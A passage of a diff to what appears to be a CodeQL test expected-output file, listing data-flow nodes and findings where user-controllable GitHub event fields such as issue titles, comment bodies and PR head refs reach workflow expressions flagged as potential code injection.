+| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| 
.github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:20:18:20:48 | 
steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | 
.github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. 
